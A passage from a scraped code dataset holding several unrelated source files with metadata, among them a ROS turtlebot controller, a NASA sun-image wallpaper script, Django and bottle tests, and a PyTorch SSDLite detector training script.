print(\"Orientation iteration \", blah)\n blah += 1\n \n tfListener.waitForTransform(fixed_frame, robot_frame, rospy.Time(), rospy.Duration(4.0))\n trans, rot = tfListener.lookupTransform(fixed_frame, robot_frame, rospy.Time()) \n \n #current_pose = Pose()\n current_point = Point()\n current_point.x = trans[0]\n current_point.y = trans[1]\n current_point.z = trans[2]\n print(rot)\n print(type(rot))\n #current_pose.position = current_point\n #current_quaternion = Quaternion()\n current_quaternion = rot\n #current_quaternion.x, current_quaternion.y, current_quaternion.z, current_quaternion.w = rot[0], rot[1], rot[2], rot[3]\n current_euler = euler_from_quaternion(rot)\n\n # given a point to move to, first orient in the direction of travel (no linear velocity)\n x_diff = target_point.x - current_point.x\n y_diff = target_point.y - current_point.y\n\n euclidean_dist = np.sqrt(x_diff**2 + y_diff**2)\n\n goal_angle = np.arctan(y_diff / x_diff)\n change_in_angle = -current_euler[2] + goal_angle\n\n print(\"Goal angle is \", goal_angle)\n print(\"Change in angle is \", change_in_angle)\n print(\"x_diff is \", x_diff)\n print(\"y_diff is \", y_diff)\n print(\"Current quaternion is \", current_quaternion)\n print(\"Current euler is \", current_euler)\n\n if euclidean_dist < pos_epsilon_error or (np.abs(x_diff) < x_diff_error and np.abs(y_diff) < y_diff_error):\n reachedPosition = True\n pub.publish(zero_cmd)\n print(\"REACHED POSITION\")\n r2.sleep()\n break\n\n if np.abs(change_in_angle) < orientation_epsilon_error:\n reachedOrientation = True\n print(\"REACHED ANGLE\")\n pub.publish(zero_cmd)\n r.sleep()\n break\n\n cmd = Twist()\n cmd.linear = Vector3()\n cmd.angular = Vector3()\n\n cmd.linear.x = 0.0\n cmd.linear.y = 0.0\n cmd.linear.z = 0.0\n cmd.angular.x = 0.0\n cmd.angular.y = 0.0\n cmd.angular.z = change_in_angle # * freq * 2 #np.arctan(y/x) #y # theta_dot\n\n pub.publish(cmd)\n r.sleep()\n #pub.publish(cmd)\n #r.sleep()\n #pub.publish(cmd)\n #r.sleep()\n\n # now, move straight with 0 orientation (no angular velocity)\n\n if reachedPosition:\n break\n kj = 0\n reachedOrientation = False\n while kj < 10:\n\n print(\"Iteration \", kj)\n kj += 1\n\n tfListener.waitForTransform(robot_frame, fixed_frame, rospy.Time(), rospy.Duration(4.0))\n trans, rot = tfListener.lookupTransform(robot_frame, fixed_frame, rospy.Time()) \n \n #current_pose = Pose()\n current_point = Point()\n current_point.x = trans[0]\n current_point.y = trans[1]\n current_point.z = trans[2]\n\n # given a point to move to, first orient in the direction of travel (no linear velocity)\n x_diff = target_point.x - current_point.x\n y_diff = target_point.y - current_point.y\n\n euclidean_dist = np.sqrt(x_diff**2 + y_diff**2)\n\n if euclidean_dist < pos_epsilon_error or (np.abs(x_diff) < x_diff_error and np.abs(y_diff) < y_diff_error):\n reachedPosition = True\n pub.publish(zero_cmd)\n print(\"REACHED POSITION\")\n r2.sleep()\n break\n\n cmd2 = Twist()\n cmd2.linear = Vector3()\n cmd2.angular = Vector3()\n\n cmd2.linear.x = euclidean_dist\n cmd2.linear.y = 0.0\n cmd2.linear.z = 0.0\n cmd2.angular.x = 0.0\n cmd2.angular.y = 0.0\n cmd2.angular.z = 0.0\n\n pub.publish(cmd2)\n r2.sleep()\n\n\n\n # try:\n # # Process trans to get your state error\n # # Generate a control command to send to the robot\n # x = target_pose.position.x - current_pose.position.x\n # y = target_pose.position.y - current_pose.position.y\n\n\n # x_dot = np.sqrt((x)**2 + (y)**2)\n\n # if x_dot < epsilon_error:\n # reached = True\n # break\n\n # theta_dot = target_pose.orientation.w - w[3]\n\n # # x_dot = K1 * trans.transform.translation.x\n # # theta_dot = K2 * trans.transform.translation.y\n # print(\"X dot \", x_dot)\n # print(\"Theta dot \", theta_dot)\n\n # cmd = Twist()\n\n # cmd.linear.x = K1 * x_dot\n # cmd.linear.y = 0.0\n # cmd.linear.z = 0.0\n # cmd.angular.x = 0.0\n # cmd.angular.y = 0.0\n # cmd.angular.z = 1 #np.arctan(y/x) #y # theta_dot\n\n # control_command = cmd\n\n # #################################### end your code ###############\n\n # pub.publish(control_command)\n\n # except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n # reached = True #move on to next target? \n\n # # Use our rate object to sleep until it is time to publish again\n # r.sleep()\n\n\ndef pose_to_trans(p):\n q = p.pose.orientation\n pos = p.pose.position\n T = quaternion_matrix([q.x,q.y,q.z,q.w])\n T[:3,3] = np.array([pos.x,pos.y,pos.z])\n return T\n\n \n\n#Define the method which contains the node's main functionality\ndef listener():\n\n #Create a new instance of the rospy.Subscriber object which we can \n #use to receive messages of type std_msgs/String from the topic /chatter_talk.\n #Whenever a new message is received, the method callback() will be called\n #with the received message as its first argument.\n rospy.Subscriber(\"path_points\", PointArray, controller)\n\n\n\n #Wait for messages to arrive on the subscribed topics, and exit the node\n #when it is killed with Ctrl+C\n rospy.spin()\n\n \n# This is Python's sytax for a main() method, which is run by default\n# when exectued in the shell\nif __name__ == '__main__':\n # Check if the node has received a signal to shut down\n # If not, run the talker method\n #Run this program as a new node in the ROS computation graph \n #called /turtlebot_controller.\n rospy.init_node('turtlebot_controller', anonymous=True)\n #controller()\n\n listener()", "repo_name": "srishti-99/final_project", "sub_path": "workspace/src/rrt/src/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 8705, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rospy.Publisher", "line_number": 31, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 31, "usage_type": "argument"}, {"api_name": "tf.TransformListener", "line_number": 33, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 39, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 41, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 51, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 52, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 53, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 78, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 78, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 79, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Point", "line_number": 82, "usage_type": "call"}, {"api_name": "tf.transformations.euler_from_quaternion", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 117, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 124, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 125, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 126, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 153, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 153, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 154, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Point", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 168, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 175, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 176, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 177, "usage_type": "call"}, {"api_name": "tf.transformations.quaternion_matrix", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 237, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 249, "usage_type": "call"}, {"api_name": "rrt.msg.PointArray", "line_number": 249, "usage_type": "argument"}, {"api_name": "rospy.spin", "line_number": 255, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 265, "usage_type": "call"}]} +{"seq_id": "42468540470", "text": "from PIL import Image\nimport os\nimport urllib.request\n\nSUN_IMAGE_URL_NASA = \"https://sdo.gsfc.nasa.gov/assets/img/latest/latest_4096_211193171.jpg\"\nIMAGE_WORKING_DIRECTORY = \"bgs\"\nSOURCE_IMAGE_FILENAME = \"source.jpg\"\n\n\ndef download_image():\n global SUN_IMAGE_URL_NASA, IMAGE_WORKING_DIRECTORY, \\\n SOURCE_IMAGE_FILENAME\n # Make the working directory for images\n # if it doesn't exist.\n if not os.path.exists(IMAGE_WORKING_DIRECTORY):\n os.makedirs(IMAGE_WORKING_DIRECTORY)\n # Download the image\n urllib.request.urlretrieve(\n SUN_IMAGE_URL_NASA, \"{}/{}\".format(IMAGE_WORKING_DIRECTORY, SOURCE_IMAGE_FILENAME))\n\n\ndef create_backgrounds():\n global IMAGE_WORKING_DIRECTORY, SOURCE_IMAGE_FILENAME\n # The source image is 4096x4096\n # Split it with PIL to make the 1920x1080 pieces for both monitors\n with Image.open(\"{}/{}\".format(IMAGE_WORKING_DIRECTORY, SOURCE_IMAGE_FILENAME)) as image:\n # Crop the portion that makes up the left monitor\n monitor_left = (128, 1508, 2048, 2588)\n monitor_region_left = image.crop(monitor_left)\n # Crop the portion that makes up the right monitor\n monitor_right = (2048, 1508, 3968, 2588)\n monitor_region_right = image.crop(monitor_right)\n # Write the images to disk\n monitor_region_left.save(\n \"{}/monitor_left.jpg\".format(IMAGE_WORKING_DIRECTORY))\n monitor_region_right.save(\n \"{}/monitor_right.jpg\".format(IMAGE_WORKING_DIRECTORY))\n\n\ndef main():\n # Download the image from NASA\n download_image()\n # Create the Desktop wallpaper images\n create_backgrounds()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ValliereMagic/SunBGPy", "sub_path": "src/sun_bg.py", "file_name": "sun_bg.py", "file_ext": "py", "file_size_in_byte": 1674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 18, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 18, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 18, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "28693741799", "text": "\"\"\"Test for email util module.\"\"\"\n\nimport time\nfrom builtins import str\n\nfrom django.test import TestCase\n\nfrom pykeg.core import models\nfrom pykeg.util import email\n\n\nclass EmailUtilTests(TestCase):\n def setUp(self):\n self.user = models.User.objects.create(\n username=\"email-test\", email=\"email-test@example.com\"\n )\n\n def tearDown(self):\n self.user.delete()\n\n def test_build_email_change_token(self):\n token = email.build_email_change_token(self.user, \"new-address@example.com\")\n uid, new_address = email.verify_email_change_token(self.user, token)\n self.assertEqual(self.user.id, uid)\n self.assertEqual(\"new-address@example.com\", new_address)\n\n def test_expiration(self):\n token = email.build_email_change_token(self.user, \"new-address@example.com\")\n time.sleep(1.1)\n try:\n email.verify_email_change_token(self.user, token, max_age=1)\n self.fail(\"Should have thrown exception\")\n except ValueError as e:\n self.assertTrue(\"Signature age\" in str(e))\n", "repo_name": "Kegbot/kegbot-server", "sub_path": "pykeg/util/email_test.py", "file_name": "email_test.py", "file_ext": "py", "file_size_in_byte": 1082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 191, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "pykeg.core.models.User.objects.create", "line_number": 14, "usage_type": "call"}, {"api_name": "pykeg.core.models.User", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pykeg.core.models", "line_number": 14, "usage_type": "name"}, {"api_name": "pykeg.util.email.build_email_change_token", "line_number": 22, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 22, "usage_type": "name"}, {"api_name": "pykeg.util.email.verify_email_change_token", "line_number": 23, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 23, "usage_type": "name"}, {"api_name": "pykeg.util.email.build_email_change_token", "line_number": 28, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "pykeg.util.email.verify_email_change_token", "line_number": 31, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 31, "usage_type": "name"}, {"api_name": "builtins.str", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "7082399978", "text": "import requests\n\nUSERNAME = 'Fionn'\nAPI_KEY = ''\nBASE_URL = 'https://api.sketchengine.eu/bonito/run.cgi'\n\ndef get_sketch():\n\tdata = {\n\t\t'format': 'json',\n\t\t'lemma': 'book',\n\t\t'lpos': '-v'\n\t}\n\tres = requests.get(BASE_URL + '/wsketch?corpname=preloaded/bnc2', params=data, auth=(USERNAME, API_KEY)).json()\n\tprint(res)\n\tprint('There are %d grammar relations for %s%s (lemma + POS) in corpus %s.' %\n\t\t(len(res['Gramrels']), data['lemma'], data['lpos'], data['corpname']))\n\nif __name__ == '__main__':\n\tget_sketch()", "repo_name": "FionnCasey/SEO-Auto-audit", "sub_path": "sketchengine.py", "file_name": "sketchengine.py", "file_ext": "py", "file_size_in_byte": 509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "38773545531", "text": "from tsdesktop.testing import TSDesktopTest\nfrom .dockman import view\nfrom tsdesktop import dockman\nfrom bottle import HTTPResponse, HTTPError\n\nimages = [{}]\ncontainers = [{'Status': None}]\n\nclass Views(TSDesktopTest):\n cli = None\n\n def setUp(self):\n self.cli = dockman._mockClient()\n\n def test_dockman(self):\n r = view()\n self.assertLinesContains(r,\n '
    ')\n\n def test_dockmanActionInvalid(self):\n r = view('mysqld', 'invalid')\n self.assertResponse(r, 400)\n\n def test_dockmanPingFail(self):\n self.cli.pingFail = True\n with self.assertRaises(HTTPError) as cm:\n r = view()\n self.assertResponseError(cm.exception)\n\n def test_pullImage(self):\n with self.assertRaises(HTTPResponse) as cm:\n view('mysqld', 'pull-image')\n self.assertRedirect(cm.exception, location='/dockman')\n\n def test_pullImageInvalid(self):\n r = view('faked', 'pull-image')\n self.assertResponse(r, 400)\n\n def test_pullImageError(self):\n self.cli.mock(images, '{\"error\": \"fake error\"}')\n r = view('mysqld', 'pull-image')\n self.assertResponseError(r)\n\n def test_serviceStart(self):\n self.cli.mock([{'Status': ''}])\n with self.assertRaises(HTTPResponse) as cm:\n view('mysqld', 'start')\n self.assertRedirect(cm.exception, location='/dockman')\n\n def test_serviceStartError(self):\n self.cli.mock(containers)\n self.cli.mock('{\"error\": \"service start fake error\"}')\n r = view('mysqld', 'start')\n self.assertResponse(r, 400)\n\n def test_serviceStop(self):\n self.cli.mock([{\n 'Status': 'Up since...',\n 'Names': ['/tsdesktop-mysqld'],\n }])\n with self.assertRaises(HTTPResponse) as cm:\n r = view('mysqld', 'stop')\n self.assertRedirect(cm.exception, location='/dockman')\n\n def test_serviceStopError(self):\n self.cli.mock(containers)\n self.cli.mock('{\"error\": \"service stop fake error\"}')\n r = view('mysqld', 'stop')\n self.assertResponse(r, 400)\n", "repo_name": "tsadm/desktop", "sub_path": "lib/tsdesktop/bottman/views/dockman_test.py", "file_name": "dockman_test.py", "file_ext": "py", "file_size_in_byte": 2158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tsdesktop.testing.TSDesktopTest", "line_number": 9, "usage_type": "name"}, {"api_name": "tsdesktop.dockman._mockClient", "line_number": 13, "usage_type": "call"}, {"api_name": "tsdesktop.dockman", "line_number": 13, "usage_type": "name"}, {"api_name": "dockman.view", "line_number": 16, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 21, "usage_type": "call"}, {"api_name": "bottle.HTTPError", "line_number": 26, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 27, "usage_type": "call"}, {"api_name": "bottle.HTTPResponse", "line_number": 31, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 32, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 36, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 41, "usage_type": "call"}, {"api_name": "bottle.HTTPResponse", "line_number": 46, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 47, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 53, "usage_type": "call"}, {"api_name": "bottle.HTTPResponse", "line_number": 61, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 62, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "11287279034", "text": "from functools import partial\nimport json\nimport os\nimport random\nfrom pathlib import Path\nfrom random import shuffle\nimport contextlib\n\nimport imgaug.augmenters as iaa\nimport cv2\nimport mlflow\nimport numpy as np\nfrom torch import nn\nimport torch\nfrom torch.optim.lr_scheduler import CosineAnnealingLR\nfrom torchvision.models.detection.backbone_utils import _validate_trainable_layers\nfrom torchvision.models.detection.ssd import SSD\nfrom torchvision.models.mobilenetv3 import MobileNet_V3_Large_Weights, mobilenet_v3_large\nfrom torchvision.models.detection import _utils as det_utils\nfrom torchvision.models.detection.anchor_utils import DefaultBoxGenerator\nimport arrow\nfrom torch.utils.data import DataLoader, Dataset\nfrom ranger21 import Ranger21\nfrom tqdm import tqdm\nfrom torchvision.models.detection.ssdlite import SSDLiteHead, _normal_init, SSDLite320_MobileNet_V3_Large_Weights, _mobilenet_extractor\nfrom torchmetrics.detection.mean_ap import MeanAveragePrecision\n\n\nclass CircularDataset(Dataset):\n def __init__(self, samples, img_shape, aug=None):\n data = []\n self._aug = aug\n self._img_shape = img_shape\n for sample in samples:\n json_path = f'{sample[:-3]}json'\n with open(json_path) as f:\n label = json.load(f)['shapes']\n data.append((sample, label))\n self._samples = data\n\n def __len__(self):\n return len(self._samples)\n\n def __getitem__(self, item):\n img_path, label = self._samples[item]\n img = cv2.imread(img_path)\n with contextlib.suppress(TypeError):\n img = self._aug(image=img)\n zeros = np.zeros(self._img_shape + (3,))\n if self._aug:\n left = random.randint(0, self._img_shape[1] - img.shape[1])\n top = random.randint(0, self._img_shape[0] - img.shape[0])\n else:\n left = 0\n top = 0\n zeros[top:top + img.shape[0], left:left + img.shape[1]] = img\n boxes = [\n np.array(\n [\n shape['points'][0][0] + left,\n shape['points'][0][1] + top,\n shape['points'][1][0] + left,\n shape['points'][1][1] + top,\n ]\n )\n for shape in label\n ]\n boxes = np.array(boxes)\n return zeros.transpose((2, 0, 1)), boxes, np.ones((boxes.shape[0],))\n\ndef create_model(size, detections_per_img, topk_candidates, positive_fraction):\n weights = SSDLite320_MobileNet_V3_Large_Weights.verify(SSDLite320_MobileNet_V3_Large_Weights.DEFAULT)\n weights_backbone = MobileNet_V3_Large_Weights.verify(MobileNet_V3_Large_Weights.DEFAULT)\n\n trainable_backbone_layers = _validate_trainable_layers(\n weights is not None or weights_backbone is not None, None, 6, 6\n )\n\n # Enable reduced tail if no pretrained backbone is selected. See Table 6 of MobileNetV3 paper.\n reduce_tail = weights_backbone is None\n\n norm_layer = partial(nn.BatchNorm2d, eps=0.001, momentum=0.03)\n\n backbone = mobilenet_v3_large(\n weights=weights_backbone, progress=True, norm_layer=norm_layer, reduced_tail=reduce_tail\n )\n if weights_backbone is None:\n # Change the default initialization scheme if not pretrained\n _normal_init(backbone)\n backbone = _mobilenet_extractor(\n backbone,\n trainable_backbone_layers,\n norm_layer,\n )\n\n anchor_generator = DefaultBoxGenerator([[2, 3] for _ in range(6)], min_ratio=0.2, max_ratio=0.95)\n out_channels = det_utils.retrieve_out_channels(backbone, size)\n num_anchors = anchor_generator.num_anchors_per_location()\n if len(out_channels) != len(anchor_generator.aspect_ratios):\n raise ValueError(\n f\"The length of the output channels from the backbone {len(out_channels)} do not match the length of the anchor generator aspect ratios {len(anchor_generator.aspect_ratios)}\"\n )\n\n defaults = {\n \"score_thresh\": 0.001,\n \"nms_thresh\": 0.9,\n \"detections_per_img\": detections_per_img,\n \"topk_candidates\": topk_candidates,\n \"positive_fraction\": positive_fraction,\n # Rescale the input in a way compatible to the backbone:\n # The following mean/std rescale the data from [0, 1] to [-1, 1]\n \"image_mean\": [0.5, 0.5, 0.5],\n \"image_std\": [0.5, 0.5, 0.5],\n }\n return SSD(\n backbone,\n anchor_generator,\n size,\n 2,\n head=SSDLiteHead(out_channels, num_anchors, 2, norm_layer),\n **defaults,\n )\n\n\ndef main():\n os.makedirs(weight_dir, exist_ok=True)\n model = create_model(img_shape[::-1], detections_per_img, topk_candidates, positive_fraction).to(torch.float32).cuda()\n samples = [str(sample) for sample in Path(data_dir).glob('*.jpg')]\n train_count = round(0.8 * len(samples))\n shuffle(samples)\n train = samples[:train_count]\n val = samples[train_count:]\n train_loader = DataLoader(CircularDataset(\n train, img_shape, aug), batch_size=batch_size, shuffle=True)\n val_loader = DataLoader(CircularDataset(val, img_shape), batch_size=batch_size)\n\n opt = Ranger21(model.parameters(), lr=lr, num_epochs=epochs, num_batches_per_epoch=len(train_loader),\n warmdown_active=False, use_warmup=False)\n scheduler = CosineAnnealingLR(opt, T_max=epochs)\n run_name = f\"{arrow.now().format('MMDD_HHmm')}\"\n weight_path = f'{weight_dir}/{run_name}.pth'\n mlflow.start_run(run_name=run_name)\n mlflow.log_params({\n 'lr': lr,\n 'batch_size': batch_size,\n 'topk_candidates': topk_candidates,\n 'detections_per_img': detections_per_img,\n 'positive_fraction': positive_fraction,\n })\n model.train()\n best_map = 0\n for epoch_i in tqdm(range(epochs)):\n losses = []\n for batch_x, boxes, labels in train_loader:\n targets = [\n {\n 'boxes': boxes[i].to(torch.long).cuda(),\n 'labels': labels[i].to(torch.long).cuda(),\n }\n for i in range(boxes.shape[0])\n ]\n opt.zero_grad(set_to_none=True)\n y_pred = model(batch_x.to(torch.float32).cuda(), targets)\n loss = y_pred['bbox_regression'] + y_pred['classification']\n loss.backward()\n opt.step()\n losses.append(loss.cpu().detach().numpy())\n scheduler.step()\n\n mlflow.log_metric('train_loss', np.mean(losses), epoch_i)\n if (epoch_i + 1) % eval_interval == 0:\n model.eval()\n val_map = MeanAveragePrecision()\n for batch_x, boxes, labels in val_loader:\n targets = [\n {\n 'boxes': boxes[i].to(torch.long).cuda(),\n 'labels': labels[i].to(torch.long).cuda(),\n }\n for i in range(boxes.shape[0])\n ]\n with torch.no_grad():\n y_pred = model(batch_x.cuda().to(torch.float32))\n val_map.update(y_pred, targets)\n val_map = val_map.compute()\n model.train()\n map_75 = val_map['map_75'].item()\n if map_75 > best_map:\n best_map = map_75\n torch.save(model.state_dict(), f'{weight_path[:-3]}best_map.pth')\n\n mlflow.log_metrics({\n 'map': val_map['map'].item(),\n 'map_50': val_map['map_50'].item(),\n 'map_75': map_75,\n }, epoch_i)\n\n\nif __name__ == '__main__':\n lr = 0.005\n positive_fraction = 0.7\n topk_candidates = 10\n detections_per_img = 2\n aug = iaa.Sequential([\n iaa.AdditiveGaussianNoise(scale=(0, 0.2*255)),\n iaa.Multiply((0.8, 1.2)),\n iaa.MultiplyHueAndSaturation((0.8, 1.2), per_channel=True),\n iaa.Cutout(nb_iterations=(1, 4), size=0.1, squared=False),\n ])\n epochs = 500\n eval_interval = 10\n batch_size = 32\n img_shape = (166, 762)\n weight_dir = 'weight/detector'\n data_dir = 'data/test_data/test_images'\n main()\n", "repo_name": "hoangphucITJP/eklipse", "sub_path": "train_detector.py", "file_name": "train_detector.py", "file_ext": "py", "file_size_in_byte": 8119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 29, "usage_type": "name"}, {"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 46, "usage_type": "call"}, {"api_name": "contextlib.suppress", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 51, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLite320_MobileNet_V3_Large_Weights.verify", "line_number": 72, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLite320_MobileNet_V3_Large_Weights", "line_number": 72, "usage_type": "name"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLite320_MobileNet_V3_Large_Weights.DEFAULT", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torchvision.models.mobilenetv3.MobileNet_V3_Large_Weights.verify", "line_number": 73, "usage_type": "call"}, {"api_name": "torchvision.models.mobilenetv3.MobileNet_V3_Large_Weights", "line_number": 73, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenetv3.MobileNet_V3_Large_Weights.DEFAULT", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torchvision.models.detection.backbone_utils._validate_trainable_layers", "line_number": 75, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenetv3.mobilenet_v3_large", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite._normal_init", "line_number": 89, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite._mobilenet_extractor", "line_number": 90, "usage_type": "call"}, {"api_name": "torchvision.models.detection.anchor_utils.DefaultBoxGenerator", "line_number": 96, "usage_type": "call"}, {"api_name": "torchvision.models.detection._utils.retrieve_out_channels", "line_number": 97, "usage_type": "call"}, {"api_name": "torchvision.models.detection._utils", "line_number": 97, "usage_type": "name"}, {"api_name": "torchvision.models.detection.ssd.SSD", "line_number": 115, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLiteHead", "line_number": 120, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 128, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 135, "usage_type": "call"}, {"api_name": "ranger21.Ranger21", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 139, "usage_type": "call"}, {"api_name": "arrow.now", "line_number": 140, "usage_type": "call"}, {"api_name": "mlflow.start_run", "line_number": 142, "usage_type": "call"}, {"api_name": "mlflow.log_params", "line_number": 143, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.long", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 163, "usage_type": "attribute"}, {"api_name": "mlflow.log_metric", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 170, "usage_type": "call"}, {"api_name": "torchmetrics.detection.mean_ap.MeanAveragePrecision", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.long", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 183, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 190, "usage_type": "call"}, {"api_name": "mlflow.log_metrics", "line_number": 192, "usage_type": "call"}, {"api_name": "imgaug.augmenters.Sequential", "line_number": 204, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 204, "usage_type": "name"}, {"api_name": "imgaug.augmenters.AdditiveGaussianNoise", "line_number": 205, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 205, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Multiply", "line_number": 206, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 206, "usage_type": "name"}, {"api_name": "imgaug.augmenters.MultiplyHueAndSaturation", "line_number": 207, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 207, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Cutout", "line_number": 208, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 208, "usage_type": "name"}]} +{"seq_id": "8359396784", "text": "from typing import Dict, Final, FrozenSet\n\nfrom database import db\nfrom flask import Blueprint, g, request\nfrom mysql.connector.optionfiles import re\nfrom supertokens_python.recipe.session import SessionContainer\nfrom supertokens_python.recipe.session.framework.flask import verify_session\n\nblueprint: Blueprint = Blueprint(\"update_enrollment\", __name__)\n\nCOURSE_COLS: Final[FrozenSet[str]] = frozenset(\n {\n \"course_id\",\n \"cat_id\",\n \"term\",\n \"year\",\n \"grade\",\n }\n)\n\n_GRADE: Dict[str, float] = {\n \"A\": 4.0,\n \"B+\": 3.5,\n \"B\": 3.0,\n \"C+\": 2.5,\n \"C\": 2.0,\n \"D+\": 1.5,\n \"D\": 